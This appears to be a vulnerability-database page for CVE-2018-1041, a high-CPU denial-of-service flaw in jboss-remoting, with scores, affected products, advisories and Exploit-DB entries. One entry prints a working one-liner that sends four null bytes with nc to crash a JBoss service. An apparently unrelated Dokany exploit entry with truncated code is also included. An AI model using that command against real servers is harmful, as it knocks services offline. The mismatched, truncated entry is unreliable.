CVE-2018-1041
published 2018-02-15
CVE-2018-1041: A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3.3.10, reads from an empty buffer. An attacker could use this…
Priority: P355 · high · 7.5 (CVSS 3.0)
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EXPLOIT
EPSS: 15.81% (96.5th percentile)
A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3.3.10, reads from an empty buffer. An attacker could use this flaw to cause denial of service via high CPU caused by an infinite loop.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jboss | jboss-remoting | — | — |
| red_hat_inc | jboss-remoting | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
CVSS provenance
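| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| vendor_redhat | — | 7.5 | HIGH | — |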
GHSA
GHSA-r69p-rc7c-rr2m: A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3
ghsa_unreviewed·2022-05-13
CVE-2018-1041 [HIGH] CWE-835 GHSA-r69p-rc7c-rr2m: A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3
Red Hat
jboss-remoting: High CPU Denial of Service
vendor_redhat·2018-02-05·CVSS 7.5
CVE-2018-1041 [HIGH] CWE-835 jboss-remoting: High CPU Denial of Service
A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3.3.10.Final-redhat-1, reads from an empty buffer. An attacker could use this flaw to cause denial of service via high CPU caused by an infinite loop.
Package: jboss-remoting (Red Hat JBoss Enterprise Application Platform 7) - Not affected
No detection rules found.
Exploit-DB
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation
exploitdb·2019-01-14·CVSS 7.8
CVE-2018-5410 [HIGH] Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation
---
/*
Exploit Title - Dokany Stack-based Buffer Overflow Privilege Escalation
Date - 14th January 2019
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://dokan-dev.github.io
Tested Version - 1.2.0.1000
Driver Version - 1.2.0.1000 - dokan1.sys
Software package - https://github.com/dokan-dev/dokany/releases/download/v1.2.0.1000/DokanSetupDbg_redist.exe
Tested on OS - 32bit Windows 7
CVE ID - CVE-2018-5410
Vendor fix url - https://github.com/dokan-dev/dokany/releases/tag/v1.2.1.1000
CERT/CC Vul note - https://www.kb.cert.org/vuls/id/741315
Fixed Version - 1.2.1.1000
Fixed driver ver - 1.2.1.1000
Check blogpost for details:
https://www.greyhathacker.net/?p=1041
*/
#include
#include
#define BUFSIZE 8
Exploit-DB
JBoss Remoting 6.14.18 - Denial of Service
exploitdb·2018-02-16·CVSS 7.5
CVE-2018-1041 [HIGH] JBoss Remoting 6.14.18 - Denial of Service
---
# Exploit Title: Exploit Denial of Service JBoss Remoting (4447/9999)
# Date: 14-02-2018
# Exploit Author: Frank Spierings
# Vendor Homepage: https://www.redhat.com/en/technologies/jboss-middleware/application-platform/get-started
# Software Link: http://ftp.redhat.com/pub/redhat/jboss/eap/
# Version: JBoss EAP 6.14.18 | Fixed in JBoss EAP 6.14.19
# Tested on: Red Hat Enterprise Linux Server release 7.4 |
# CVE : CVE-2018-1041
This is a very easy Denial of Service exploit. The target only requires 4
null bytes: `\x00\x00\x00\x00`.
The CPU will instantly spike after receiving this payload.
printf "\x00\x00\x00\x00" | nc
`printf "\x00\x00\x00\x00" | nc 127.0.0.1 4447`
http://www.securitytracker.com/id/1040323
https://access.redhat.com/errata/RHSA-2018:0268
https://access.redhat.com/errata/RHSA-2018:0269
https://access.redhat.com/errata/RHSA-2018:0270
https://access.redhat.com/errata/RHSA-2018:0271
https://access.redhat.com/errata/RHSA-2018:0275
https://bugzilla.redhat.com/show_bug.cgi?id=1530457
https://www.exploit-db.com/exploits/44099/
Published: 2018-02-15